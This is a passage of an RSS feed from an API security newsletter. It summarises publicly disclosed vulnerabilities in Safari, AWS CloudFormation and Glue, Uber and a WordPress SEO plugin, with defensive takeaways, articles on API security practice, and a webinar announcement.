<p>The post <a href="https://apisecurity.io/issue-169-insecure-api-wordpress-plugin-tesla-3rd-party-vulnerability-introducing-vapi/">Issue 169: Insecure API in WordPress plugin, Tesla 3rd party vulnerability, introducing vAPI</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>OWASP API Security Top 10 Challenges  &#8211; Webinar Series</title>
		<link>https://apisecurity.io/owasp-api-security-top-10-challenges-webinar-series/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 20 Jan 2022 11:43:44 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9044</guid>

					<description><![CDATA[<p>In this 3-part webinar series Dr. Philippe De Ryck, Web Security Expert with Pragmatic Web Security and Colin Domoney of 42Crunch and APISecurity.io, take a deep dive into understanding and addressing the OWASP API Security Top 10 issues. Through detailed practical examples and use cases, they guide developers and security professionals through how to fix [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/owasp-api-security-top-10-challenges-webinar-series/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/owasp-api-security-top-10-challenges-webinar-series/">OWASP API Security Top 10 Challenges  &#8211; Webinar Series</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><a href="https://42crunch.com/owasp-api-security-top-10-webinar-series/"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-9013" src="https://apisecurity.io/wp-content/uploads/2022/01/42C_PWS_webinar.png" alt="" width="1928" height="1026" /></a></p>
<p>In this 3-part webinar series Dr. Philippe De Ryck, Web Security Expert with Pragmatic Web Security and Colin Domoney of 42Crunch and APISecurity.io, take a deep dive into understanding and addressing the OWASP API Security Top 10 issues. Through detailed practical examples and use cases, they guide developers and security professionals through how to fix and secure their APIs in the face of these identified threats.</p>
<p class="mt-4 mb-4 grey-out">Why attend?:</p>
<ul class="mt-4 mb-4 grey-out">
<li>APIs are the number one attack surface for hackers, learn how to protect your business today.</li>
<li>Industry leading API Security experts coach you how to improve the security posture of your APIs.</li>
<li>How to find and fix the OWASP API Security top vulnerabilities &#8211; from 1 to 10.</li>
<li>Guidance on how implementing security at design and run-time protects APIs throughout the lifecycle.</li>
</ul>
<p>&nbsp;</p>
<p><strong>Webinar 1: API security today and the OWASP API Top 10.</strong></p>
<p>11am EST / 4pm GMT &#8211; January 25, 2022</p>
<p><a href="https://42crunch.com/owasp-api-security-top-10-webinar-series/">Register</a></p>
<p>The post <a href="https://apisecurity.io/owasp-api-security-top-10-challenges-webinar-series/">OWASP API Security Top 10 Challenges  &#8211; Webinar Series</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 168: Safari 15 IndexedDB API vulnerability, a pair of AWS vulnerabilities, and an API security podcast</title>
		<link>https://apisecurity.io/issue-168-safari-15-indexeddb-api-vulnerability-a-pair-of-aws-vulnerabilities-and-an-api-security-podcast/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 20 Jan 2022 07:06:24 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9014</guid>

					<description><![CDATA[<p>This week, we have news of a vulnerability in the IndexedDB API in Safari 15 that exposed user information, a pair of vulnerabilities in AWS affecting AWS Glue and AWS CloudFormation, and a podcast featuring Rinki Sethi and Alissa Knight discussing API security. Last week, we featured an &#8220;awesome API security&#8221; guide from a 3rd-party [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-168-safari-15-indexeddb-api-vulnerability-a-pair-of-aws-vulnerabilities-and-an-api-security-podcast/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-168-safari-15-indexeddb-api-vulnerability-a-pair-of-aws-vulnerabilities-and-an-api-security-podcast/">Issue 168: Safari 15 IndexedDB API vulnerability, a pair of AWS vulnerabilities, and an API security podcast</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of a vulnerability in the IndexedDB API in Safari 15 that exposed user information, a pair of vulnerabilities in AWS affecting AWS Glue and AWS CloudFormation, and a podcast featuring Rinki Sethi and Alissa Knight discussing API security.</p>
<p>Last week, we featured an &#8220;awesome API security&#8221; guide from a 3rd-party site with good intentions. Subsequently, we&#8217;ve discovered that this guide is a direct and unattributed copy of the excellent guide by André Rainho <a href="https://apisecurity.io/issue-162-compromised-googe-cloud-accounts-graphql-as-api-gateway-api-security-guide-and-training/" target="_blank" rel="noopener noreferrer">previously featured in this newsletter</a>. Our apologies to Andre for this oversight, and we strongly advise readers to check out his original <a href="https://github.com/arainho/awesome-api-security" target="_blank" rel="noopener noreferrer">Awesome API Security</a> guide.</p>
<h2>Vulnerability: Safari 15 leaks information through IndexedDB API</h2>
<p>First up this week, we have news of <a href="https://fingerprintjs.com/blog/indexeddb-api-browser-vulnerability-safari-15/" target="_blank" rel="noopener noreferrer">a vulnerability in the IndexedDB API of the Safari 15 browser</a>, disclosed by the team at FingerprintJS. The vulnerability potentially allows <em>any</em> website to track a user&#8217;s internet activity and potentially to reveal their identity. At the time of writing, Apple engineers have been working on the issues identified and have marked the issue as resolved, although this has not yet been independently confirmed.</p>
<p>IndexedDB is a universal browser API for client-side storage that is exposed to developers through a low-level API. To enforce security, IndexedDB enforces the <em>same-origin policy,</em> which attempts to ensure that information is only shared with the &#8216;owner&#8217; by virtue of their origin (based on elements like the URL, hostname, and protocol). The bug in Safari 15 resulted from a violation of the same-origin policy: each time a website interacted with the database, a new blank database with the same name is created in <em>all</em> other active frames, tabs, and windows within the same session.</p>
<p>The fact that the database names were available across origin boundaries meant that websites could discover what other websites had been accessed within that browser session, because database names are typically unique and website-specific. As an example, the Google User ID identifies a user of the Google platform upon authentication — examining databases for well-known names in a format unique to a Google User ID could allow websites to determine authenticated users on Google.</p>
<p>Currently, there is no specific user protection or mitigation that can be taken other than to wait for Apple to release a fix or update.</p>
<h2>Vulnerability: AWS CloudFormation</h2>
<p>Orca Security’s vulnerability researcher, Tzah Pahima, revealed the first of two AWS vulnerabilities we have this week: <a href="https://orca.security/resources/blog/aws-cloudformation-vulnerability/" target="_blank" rel="noopener noreferrer">a vulnerability affecting the AWS CloudFormation API</a>. After the vulnerability was disclosed to AWS, they released a fix for it within six days, across all regions. The vulnerability was caused by an XML External Entity (XXE) vulnerability in the CloudFormation service API.</p>
<p>The attack vector was through an anomaly in the way that CloudFormation renders templates, which allowed Pahima to trigger the XXE vulnerability. This in turn could be used to read files and perform HTTP requests on behalf of the server, potentially allowing connection to internal AWS endpoints and services. Most worryingly, Pahima believes that abuse of this vulnerability could allow an attacker to bypass tenant boundaries, giving them access to any resource within AWS.</p>
<h2>Vulnerability: AWS Glue</h2>
<p>The second of the AWS vulnerabilities this week, also discovered by Orca Security, is <a href="https://orca.security/resources/blog/aws-glue-vulnerability/" target="_blank" rel="noopener noreferrer">a vulnerability within the AWS Glue service</a>. This one allowed a user to potentially create resources and access the data of other AWS Glue customers. The vulnerability was disclosed to AWS who reproduced the findings within hours. By the following morning, AWS had deployed partial mitigation globally, with the full mitigation following a few days later.</p>
<p>The vulnerability allowed attackers to use AWS Glue accounts to obtain credentials for roles within the AWS service&#8217;s own account. This in turn could have allowed a full access to the internal service API fabric. With a privilege escalation at that point, attackers could effectively had gained elevated privileges on the AWS backbone in the region.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9025" src="https://apisecurity.io/wp-content/uploads/2022/01/Articel3.png" alt="" width="608" height="297" /></p>
<p>The researchers were able to perform the following actions:</p>
<ol>
<li aria-level="1">Assume roles in AWS customer accounts which were trusted by the Glue service. In every account that uses Glue, there’s at least one role of this kind.</li>
<li aria-level="1">Query and modify AWS Glue service  related resources in a region. This includes — but is not limited to — metadata for Glue jobs, dev endpoints, workflows, crawlers, and triggers.</li>
</ol>
<h2>Podcast: Rinki Sethi and Alissa Knight on API security</h2>
<p>Finally, this week is <a href="https://www.briefingsdirectblog.com/2022/01/when-it-comes-to-api-security-expect.html" target="_blank" rel="noopener noreferrer">a podcast with BriefingsDirect</a> host Dana Gardner in conversation with Rinki Sethi (Vice President and Chief Information Security Officer (CISO) at Twitter,) and Alissa Knight (familiar to readers of this newsletter) on the topic of API security.</p>
<p>For me, the key takeaways included:</p>
<ul>
<li>Securing APIs is a multi-layered approach — APIs are meant to be exposed.</li>
<li>Traditional security products don’t protect us against business logic flaws.</li>
<li><em>&#8220;APIs are the foundational plumbing for everything in our lives today. So, rightfully so, they are attracting a lot of attention &#8212; by both black hats and white hats.&#8221;</em></li>
<li><em>&#8220;There’s no context in WAF security &#8212; and that’s what we need. We need to focus more on context in security.&#8221;</em></li>
<li><em>&#8220;I think developers generally want to be better and do better&#8221;.</em></li>
<li>Finding out what the environment looks like is the first step.</li>
<li><em>&#8220;You should form a partnership and relationship with your chief technology officer (CTO), and have that partnership with infrastructure and operations, too.&#8221;</em></li>
</ul>
<p>A great listen for anyone involved with the business or the technology around API security.</p>
<h2>Webinar: OWASP API Security Top 10 Challenges</h2>
<p>Next Tuesday 25 January at 11 am EST / 4 pm GMT I am joined by Dr. Philippe De Ryck (Web Security Expert with Pragmatic Web Security) in <a href="https://42crunch.com/owasp-api-security-top-10-webinar-series/" target="_blank" rel="noopener noreferrer">the first of a 3-part webinar series</a> taking a deep dive into understanding and addressing the OWASP API Security Top 10 issues. Through detailed practical examples and use cases, we&#8217;ll guide developers and security professionals through how to fix and secure their APIs in the face of these identified threats.</p>
<p>APIs are the number one attack surface for hackers, learn how to protect your business today.</p>
<ul>
<li>Industry-leading API Security experts coach you how to improve the security posture of your APIs.</li>
<li>How to find and fix the OWASP API Security top vulnerabilities &#8211; from 1 to 10.</li>
<li>Guidance on how implementing security at design and run-time protects APIs throughout the lifecycle.</li>
</ul>
<p><a href="https://42crunch.com/owasp-api-security-top-10-webinar-series/" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignnone wp-image-9040" src="https://apisecurity.io/wp-content/uploads/2022/01/Article5.jpg" alt="" width="643" height="248" /></a></p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-168-safari-15-indexeddb-api-vulnerability-a-pair-of-aws-vulnerabilities-and-an-api-security-podcast/">Issue 168: Safari 15 IndexedDB API vulnerability, a pair of AWS vulnerabilities, and an API security podcast</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 167: Uber bug allows spoof emails, partner-facing APIs on the rise, omnichannel APIs increase risk</title>
		<link>https://apisecurity.io/issue-167-uber-bug-allows-spoof-emails-partner-facing-apis-on-the-rise-omnichannel-apis-increase-risk/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 13 Jan 2022 07:22:56 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8985</guid>

					<description><![CDATA[<p>This week, we have a long-standing vulnerability on a public-facing internal API on Uber, which allowed attackers to spoof emails. In addition, there&#8217;s an article by NordicAPIs on the RapidAPI report into the rise on partner-facing APIs, IBM&#8217;s views on the API security risk posed by the growth in omnichannel APIs, and finally (another) awesome [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-167-uber-bug-allows-spoof-emails-partner-facing-apis-on-the-rise-omnichannel-apis-increase-risk/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-167-uber-bug-allows-spoof-emails-partner-facing-apis-on-the-rise-omnichannel-apis-increase-risk/">Issue 167: Uber bug allows spoof emails, partner-facing APIs on the rise, omnichannel APIs increase risk</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have a long-standing vulnerability on a public-facing internal API on Uber, which allowed attackers to spoof emails. In addition, there&#8217;s an article by NordicAPIs on the RapidAPI report into the rise on partner-facing APIs, IBM&#8217;s views on the API security risk posed by the growth in omnichannel APIs, and finally (another) awesome API security mega guide.</p>
<h2>Vulnerability: Uber bug allows attackers to spoof emails</h2>
<p>This week, ThreatPost featured details of a <a href="https://threatpost.com/uber-bug-ignored-emails/177395/" target="_blank" rel="noopener noreferrer">vulnerability on a public-facing internal API on Uber allowing attackers to spoof emails</a> so that they would appear to be from Uber.</p>
<p>Details of the vulnerability were disclosed by a Seekurity security researcher and bug-hunter Seif Elsallamy, who made efforts to disclose details to Uber both directly and by submitting it to HackerOne. However, Uber rejected Elsallamy&#8217;s submission out of scope, only <a href="https://twitter.com/0x21SAFE/status/1477003988792926210" target="_blank" rel="noopener noreferrer">it to be later discovered</a> that the issue has previously been reported to Uber as far back as 2015! Elsallamy has since reported that the issue appears to have been finally fixed.</p>
<p>The vulnerability enabled attackers to use a public-facing internal API on Uber to do HTML injection and send emails on behalf of Uber. Users could be tricked into believing that the emails were genuine and potentially perform unsafe actions, such as disclosing financial details or sensitive personal information. Elsallamy showed an example of a proof-of-concept spoof email below:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8991" src="https://apisecurity.io/wp-content/uploads/2022/01/Article1-1.jpg" alt="" width="600" height="584" /></p>
<p>Uber has <a href="https://apisecurity.io/issue-49-uber-account-takeover-leaky-get-api/" target="_blank" rel="noopener noreferrer">previously featured in this newsletter</a> and <a href="https://threatpost.com/uber-reveals-breach-of-57-million-users-admits-to-covering-up-incident/128969/" target="_blank" rel="noopener noreferrer">suffered a large breach in 2016</a> that lead to the disclosure of 57 million user account details.</p>
<p>The key takeaways here are:</p>
<ul>
<li>Be aware that APIs intended for internal use only may be easily discovered (and exploited) if they are connected to a public-facing network.</li>
<li>APIs can inadvertently expose previously latent vulnerabilities in downstream systems — in this case, a backend system was vulnerable to HTML injection.</li>
<li>Security-savvy organizations should have a proactive (or at least responsive) manner for dealing with bug and vulnerability reports — here, the same issue had been reported already several time previously but had not been acted upon.</li>
</ul>
<h2>Article: Partner-facing APIs on the rise</h2>
<p><a href="https://nordicapis.com/rapidapi-report-finds-partner-facing-apis-on-the-rise/" target="_blank" rel="noopener noreferrer">NordicAPIs has featured an article</a> on the rise of partner-facing APIs on the back of the recently released &#8220;State of APIs Developer Survey 2021 Report&#8221; from RapidAPI.</p>
<p>The report surveyed 2,200 developers and sampled their views on their experience with APIs, both from the perspective of internal tools to an increasing number of partner-facing APIs. The growth of such partner-facing APIs presents challenges to organizations: as the number of APIs grows, they become increasingly difficult to maintain, not to mention challenges relating to data privacy and security issues.</p>
<p>From a security perspective, two distinct challenges are highlighted:</p>
<ol>
<li>The primary API testing is focused on acceptance testing, functional testing, and integration testing, but no mention of security testing is made in the survey.</li>
<li>The skills shortage in the software has been exacerbated by the Covid-19 pandemic, and nowhere is this more profound than in software security.</li>
</ol>
<p>Many organizations are being driven towards enabling partner-facing public APIs whilst being aware that these APIs are not adequately tested from a security perspective, nor do their developers have the requisite experience to fully secure these APIs.</p>
<h2>Article: Omnichannel API growth increases API risk</h2>
<p>IBM SecurityIntelligence has featured an article on <a href="https://securityintelligence.com/articles/omnichannel-growth-increases-api-risk/" target="_blank" rel="noopener noreferrer">the rise of so-called omnichannel APIs</a> and how these are exposing organizations to increased API risk. The well-documented growth of APIs is being driven by three main factors:</p>
<ul>
<li><strong>Multi-device use</strong>: Users have multiple devices and APIs are required to provide features and functions on all of them.</li>
<li><strong>Microservices</strong>: The breakdown of the monolith architecture has led to distributed microservices, with APIs connecting them all.</li>
<li><strong>Move to the cloud</strong>: Ease of cloud deployment has also increased the rate of software deployment, including APIs.</li>
</ul>
<p>The report highlights how an omnichannel business strategy is adding further fuel to the fire of API growth. An omnichannel customer experience attempts to ensure that the customer experience remains the same regardless of the medium used, be it a web portal, a desktop app, or a variety of mobile devices. To make this experience seamless, each platform must present a consistent view to the user — and APIs are the connecting fabric that enables this experience.</p>
<p>The article concludes with recommendations how to improve API security, many of which will come as no surprise to readers of this newsletter:</p>
<ul>
<li><strong>Keep an API inventory</strong>: It&#8217;s impossible to secure what you can&#8217;t see.</li>
<li><strong>Practice secure coding</strong>: All software vulnerabilities have their origin in vulnerabilities in coding.</li>
<li><strong>Implement OAuth</strong>:  Avoid issues with token secrecy and leaks by using a robust authorization protocol.</li>
<li><strong>Implement rate limiting and throttling</strong>: Prevent abuse of APIs by limiting the rate of attack.</li>
<li><strong>Use an API gateway</strong>: Use a gateway as a central point to enforce security policies.</li>
<li><strong>Use a service mesh</strong>: Leverage the mesh to enforce authentication, access control, and other security measures throughout your services.</li>
<li><strong>Adopt Zero Trust</strong>: Do not rely on traditional perimeters or trust boundaries.</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-167-uber-bug-allows-spoof-emails-partner-facing-apis-on-the-rise-omnichannel-apis-increase-risk/">Issue 167: Uber bug allows spoof emails, partner-facing APIs on the rise, omnichannel APIs increase risk</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 166: Securing large API ecosystems, creating OpenAPI from HTTP traffic, Frankenstein APIs, and API proliferation</title>
		<link>https://apisecurity.io/issue-166-securing-large-api-ecosystems-creating-openapi-http-traffic-frankenstein-apis-api-proliferation/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 06 Jan 2022 17:27:10 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8961</guid>

					<description><![CDATA[<p>This week, we have a comprehensive article on approaches to securing large API ecosystems, an interesting read on how to create OpenAPI definitions from HTTP traffic, how &#8220;Frankenstein APIs&#8221; are exposing businesses to additional risk, and why the continued API proliferation presents security challenges to organizations. Article: Securing large API ecosystems First up this week [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-166-securing-large-api-ecosystems-creating-openapi-http-traffic-frankenstein-apis-api-proliferation/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-166-securing-large-api-ecosystems-creating-openapi-http-traffic-frankenstein-apis-api-proliferation/">Issue 166: Securing large API ecosystems, creating OpenAPI from HTTP traffic, Frankenstein APIs, and API proliferation</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have a comprehensive article on approaches to securing large API ecosystems, an interesting read on how to create OpenAPI definitions from HTTP traffic, how &#8220;Frankenstein APIs&#8221; are exposing businesses to additional risk, and why the continued API proliferation presents security challenges to organizations.</p>
<h2>Article: Securing large API ecosystems</h2>
<p>First up this week is an <a href="https://thenewstack.io/securing-large-api-ecosystems/" target="_blank" rel="noopener noreferrer">excellent article</a> from Michał Trojanowski in TheNewStack discussing the challenges facing the security of large API ecosystems. Trojanowski&#8217;s view is that security patterns applied to small-scale API deployments do not scale nor are they appropriate for larger-scale API deployments.</p>
<p>APIs tend to grow in either breadth (a flat hierarchy exposing large numbers of APIs directly) or in depth (a nested hierarchy of APIs coupled together):</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8969" src="https://apisecurity.io/wp-content/uploads/2022/01/Article1.jpg" alt="" width="459" height="599" /></p>
<p>Both patterns present security challenges in their own right, namely:</p>
<ul>
<li>For breadth-grown APIs, any caller with a valid token can access any of the API endpoints — the scope of access is typically too broad to adequately secure the endpoints.</li>
<li>For depth-grown APIs, tokens may be reused between layered API endpoints, leading to security issues or leaking tokens to 3rd party services.</li>
</ul>
<p>Trojanowski suggests some possible solutions to overcoming these challenges</p>
<ol>
<li>Use a claims-based authorization scheme (for example, the audience claim <code>aud</code>) to limit the API access for a given token.</li>
<li>Use token-sharing approaches (tokens are exchanged between coupled API services) to limit the scope of downstream services using a token, thus also limiting the impact of lost or leaked tokens.</li>
<li>Use a dedicated entitlement management system, such as Open Policy Agent.</li>
</ol>
<p>The key takeaway here is that large-scale API deployments are complex and fraught with danger if an overly simplified approach is taken with regard to security.</p>
<h2>Article: Creating OpenAPI definitions from HTTP traffic</h2>
<p>Readers of this newsletter will know I often advocate for an API-design-first strategy based on the OpenAPI Specification (OAS) at its core. The benefits are well established now, including ease of documentation, easier testing and mocking during development, and of course, being able to embed security as early as possible in the design lifecycle.</p>
<p>The biggest challenge to the design-first approach is the fact that in many cases organizations already have deployed a considerable number of APIs in production that do not have the corresponding OpenAPI definitions. Typically, this presents a challenge to teams to &#8220;reverse-engineer&#8221; a specification from an existing implementation.</p>
<p>In an article on APIsYouWon&#8217;tHate, Phil Sturgeon describes an elegant method to <a href="https://apisyouwonthate.com/blog/creating-openapi-from-http-traffic" target="_blank" rel="noopener noreferrer">obtain an OpenAPI definition by reverse-engineering based on snooping the HTTP traffic</a> to APIs. The solution uses the <a href="https://www.akitasoftware.com/" target="_blank" rel="noopener noreferrer">Akita</a> observability tool to extract the details for the API definition from the web traffic log. Sturgeon&#8217;s approach uses the <code>mitmproxy</code> tool to capture traffic and then to dump the traffic in HAR format. The Akita tool is then used to convert the HAR archive into a OpenAPI definition in YAML format.</p>
<p>As the drive toward design-first accelerates, good, robust, and automated solutions for reverse-engineering existing API deployments become increasingly important — this is a great starting point!</p>
<h2>Article: &#8220;Frankenstein APIs&#8221; explained</h2>
<p>Brenton House written <a href="https://weblogs.asp.net/bhouse/brenton-house/frankenstein-apis-explained" target="_blank" rel="noopener noreferrer">an article on his so-called &#8220;Frankenstein APIs&#8221;</a> this week, describing them as APIs which are <cite>&#8220;creatively pieced together using unorthodox methods and is driven by a strong need for functionality.&#8221;</cite></p>
<p>House describes &#8220;Frankenstein APIs&#8221; arising when an existing piece of functionality does not exist and there is a strong business need to provide bespoke functionality. The most common anti-pattern is that development teams use a variety of non-standard methods and tooling to accomplish the business objective. Unfortunately, the resultant APIs can be notoriously fragile in terms of maintainability, extensibility, and — of course —security. Typically, developers are more focused on simply getting the job done ,and delegate or totally omit security controls that might otherwise be required.</p>
<p>This is a quick and fun read on the topic. The key takeaway from House is to fully embrace an API-first strategy and to resist the temptation to rudimentary and fragile shortcuts.</p>
<h2>Article: Security pitfalls of API proliferation</h2>
<p>The final article this week comes from Byron Acohido who discusses <a href="https://securityboulevard.com/2022/01/my-take-why-companies-had-better-start-taking-the-security-pitfalls-of-api-proliferation-seriously/" target="_blank" rel="noopener noreferrer">how API proliferation is leading to security pitfalls</a>. This thought-provoking article suggests that APIs are rapidly increasing the attack surface of an organization, because APIs act as a conduit between various services, each of which may be vulnerable to attacks. Essentially, the API acts as a <cite>&#8220;built-in tool on steroids&#8221; </cite> facilitating attacks by adversaries.</p>
<p>Attackers are increasingly aware of the value of APIs as an attack vector, and many recent major cyber security breaches started with discovery or reconnaissance through public APIs before attackers pivoted to other internal systems. Additionally, APIs are also an invisible attack vector because they are often poorly documented or invisible to traditional protection mechanisms.</p>
<p>Rather unsurprisingly, Acohido&#8217;s advice for avoiding such security pitfalls is to fully embrace a shift-left approach toward API development, thereby ensuring that APIs are made visible and that any security issues can be identified and addressed as early as possible.</p>
<p>The post <a href="https://apisecurity.io/issue-166-securing-large-api-ecosystems-creating-openapi-http-traffic-frankenstein-apis-api-proliferation/">Issue 166: Securing large API ecosystems, creating OpenAPI from HTTP traffic, Frankenstein APIs, and API proliferation</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 165: Vulnerability in All in One WordPress plugin, why to treat all APIs as public, a beginner&#8217;s guide to API security</title>
		<link>https://apisecurity.io/issue-165-vulnerability-in-all-in-one-wordpress-plugin-why-to-treat-all-apis-as-public-a-beginners-guide-to-api-security/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 23 Dec 2021 14:02:18 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=8926</guid>

					<description><![CDATA[<p>This week, we have news of another high severity vulnerability in a WordPress plugin, this time the popular All in One allowing compromise via the core REST API. We also have views from @apihandyman on why to treat all APIs as public ones, a comprehensive beginner&#8217;s guide to API security, and finally an optimistic view [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-165-vulnerability-in-all-in-one-wordpress-plugin-why-to-treat-all-apis-as-public-a-beginners-guide-to-api-security/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-165-vulnerability-in-all-in-one-wordpress-plugin-why-to-treat-all-apis-as-public-a-beginners-guide-to-api-security/">Issue 165: Vulnerability in All in One WordPress plugin, why to treat all APIs as public, a beginner&#8217;s guide to API security</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of another high severity vulnerability in a WordPress plugin, this time the popular All in One allowing compromise via the core REST API. We also have views from @apihandyman on why to treat all APIs as public ones, a comprehensive beginner&#8217;s guide to API security, and finally an optimistic view from Forbes on how enterprises can achieve speed and security by adopting Zero Trust and APIs.</p>
<p>This is the final APISecurity.io newsletter for 2021. We wish all subscribers happy holidays and a prosperous New Year, and look forward to welcoming you back with issue 166 on the 6th January 2022!</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-8935 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/12/42C-APIsecurity-Xmas-Card-600px.jpg" alt="" width="600" height="421" /></p>
<h2>Vulnerability: high severity vulnerability in the All in One WordPress plugin</h2>
<p>Vulnerabilities in WordPress plugins have featured frequently in this newsletter (<a href="https://apisecurity.io/issue-158-data-of-400000-students-exposed-1-million-sites-affected-by-plugin-vulnerabilities-views-on-graphql/" target="_blank" rel="noopener noreferrer">here</a> and <a href="https://apisecurity.io/issue-153-rapid-proliferation-apis-wordpress-api-vulnerability-false-negative-api-scanning/" target="_blank" rel="noopener noreferrer">here</a>) and again <a href="https://securityboulevard.com/2021/12/critical-vulnerabilities-in-all-in-one-seo-plugin-affects-millions-of-wordpress-websites/" target="_blank" rel="noopener noreferrer">this week we feature a pair of high severity vulnerabilities</a> in the popular All in One plugin. The first vulnerability CVE-2021-25036 allows for access to high privilege API endpoints via a privilege escalation attack, whilst the second vulnerability CVE-2021-25037 allows for SQL injection via API endpoints.</p>
<p>The vulnerabilities <a href="https://jetpack.com/2021/12/14/severe-vulnerabilities-fixed-in-all-in-one-seo-plugin-version-4-1-5-3/" target="_blank" rel="noopener noreferrer">were discovered by security researcher Marc Montpas</a> who disclosed details to the All in One SEO team who remediated the issues within a week. Users are advised to update their plugin to the latest version 4.1.5.3 or later.</p>
<p>The first vulnerability potentially allows users with low-privileged accounts to access an API endpoint registered by the plugin. For example, the <code class="language-markup">aioseo/v1/htaccess</code> endpoint can rewrite a site’s .htaccess with arbitrary content. The bug is a subtle one resulting from a case-insensitive path comparison — an attacker could change the case of a path and fall through to a default which granted privilege as shown below:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-8938" src="https://apisecurity.io/wp-content/uploads/2021/12/Article1.png" alt="" width="691" height="538" /></p>
<p>The second vulnerability exploits a flaw in command escaping in the plugin allowing an attacker to exploit the privilege gained via the first vulnerability to execute arbitrary databases queries.</p>
<p>The key takeaway here is the same as per all previous WordPress plugin exploits:</p>
<ul>
<li>Plugin authors should ensure that all API endpoints are fully authenticated and authorized.</li>
<li>Developers should ensure that authorization methods have sensible &#8216;fail safes&#8217; or defaults — in this case, the default was to allow authorization.</li>
</ul>
<h2>Opinion: All APIs should be treated like public APIs</h2>
<p>One of the tradeoffs organizations need to make when approaching API security is whether to treat internal (or non public-facing) APIs differently from external (or public-facing) APIs. Instinctively one may feel internal APIs present a low risk to an organization and as such could be deprioritized from a security perspective. <a href="https://apihandyman.io/5-reasons-why-you-should-treat-private-apis-like-public-ones/" target="_blank" rel="noopener noreferrer">In a recent article</a> Arnaud Lauret (aka. @apihandyman) makes a compelling case for treating all APIs as if they were external in all cases.</p>
<p>Laurent argues the cases on key five points:</p>
<ul>
<li>Nurturing people’s API mindset: use your internal API development to evolve best practices to ensure that your external APIs are &#8216;battle hardened&#8217; when released.</li>
<li>Simplifying architecture: avoid overly complex APIs designed to meet niche internal demands by enforcing a simplified architecture i.e. HTTP only APIs.</li>
<li>Ensuring a good level of security: internal APIs may create a false sense of security in the way that APIs are designed from a security perspective.</li>
<li>Reducing costs: simplifying the architecture and having standard well-documented interfaces reduces the need for custom or bespoke internal-only APIs.</li>
<li>Achieving faster time to market: having a well-designed internal API that can be easily enabled for public access can reduce development effort and hence time to market.</li>
</ul>
<p>From my point of view, the security aspect of treating all APIs as external by default is the most compelling. APIs should be designed to be secure by default regardless of where or how they are deployed since there is no guarantee as to how these APIs may be deployed in the future. As an example, an internal API may be enabled for external access due to changing business requirements such as the enablement of a new B2B partner. Assuming an API will be forever internal-only creates a false sense of security.</p>
<p>Additionally inadequately secured APIs expose additional attack surfaces which may be exploited by skilled attackers as part of lateral movement once they have penetrated external boundaries such as firewalls or gateways. The safest strategy is to assume zero trust and that all APIs may at any time be subject to attack.</p>
<p>By far the greatest advantage of assuming all APIs are external facing is the shift in perspectives toward security. API developers gain a greater awareness of the attack vectors and risks and are incentivized to treat security as a first-class element of good API design, rather than as an afterthought.</p>
<h2>Guide: Beginner&#8217;s guide to API security</h2>
<p>DZone <a href="https://dzone.com/articles/api-security-beginners-guide" target="_blank" rel="noopener noreferrer">featured an excellent article</a> from Artem Arzamas on the beginner&#8217;s guide to API security. This comprehensive article should prove to be an invaluable resource to any newcomers to API development needing to consider security aspects and best practices.</p>
